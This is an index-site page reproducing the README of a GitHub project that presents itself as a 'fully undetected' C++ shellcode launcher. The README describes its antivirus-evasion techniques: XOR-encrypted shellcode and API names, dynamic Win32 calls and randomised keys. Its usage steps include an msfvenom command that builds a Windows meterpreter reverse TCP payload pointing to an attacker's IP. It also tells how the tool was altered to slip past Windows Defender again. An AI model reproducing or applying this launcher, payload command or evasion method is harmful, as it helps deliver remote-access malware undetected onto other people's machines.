Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/9emin1/charlotte
c++ fully undetected shellcode launcher ;)
https://github.com/9emin1/charlotte
Last synced: 3 months ago
JSON representation
c++ fully undetected shellcode launcher ;)
- Host: GitHub
- URL: https://github.com/9emin1/charlotte
- Owner: 9emin1
- Created: 2021-05-13T07:32:03.000Z (over 3 years ago)
- Default Branch: main
- Last Pushed: 2021-06-11T04:44:18.000Z (over 3 years ago)
- Last Synced: 2024-06-06T23:39:55.628Z (5 months ago)
- Language: Python
- Size: 4.92 MB
- Stars: 956
- Watchers: 27
- Forks: 212
- Open Issues: 7
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
- awesome-hacking-lists - 9emin1/charlotte - c++ fully undetected shellcode launcher ;) (Python)
README
# charlotte
c++ fully undetected shellcode launcher ;)
releasing this to celebrate the birth of my newborn
## description
13/05/2021:
1. c++ shellcode launcher, fully undetected 0/26 as of 13th May 2021.
2. dynamic invoking of win32 api functions
3. XOR encryption of shellcode and function names
4. randomised XOR keys and variables per run
5. on Kali Linux, simply 'apt-get install mingw-w64*' and thats it!
17/05/2021:
6. random strings length and XOR keys length
## antiscan.me
## usage
git clone the repository, generate your shellcode file with the naming beacon.bin, and run charlotte.py
example:
1. git clone https://github.com/9emin1/charlotte.git && apt-get install mingw-w64*
2. cd charlotte
3. msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=$YOUR_IP LPORT=$YOUR_PORT -f raw > beacon.bin
4. python charlotte.py
5. profit
### tested with msfvenom -p (shown in the .gif POC below) and also cobalt strike raw format payload
## update v1.1
17/05/21:
apparently Microsoft Windows Defender was able to detect the .DLL binary,
and how did they flag it? by looking for several XOR keys of 16 byte size
changing it to 9 shown in the POC .gif below shows it is now undetected again
cheers!
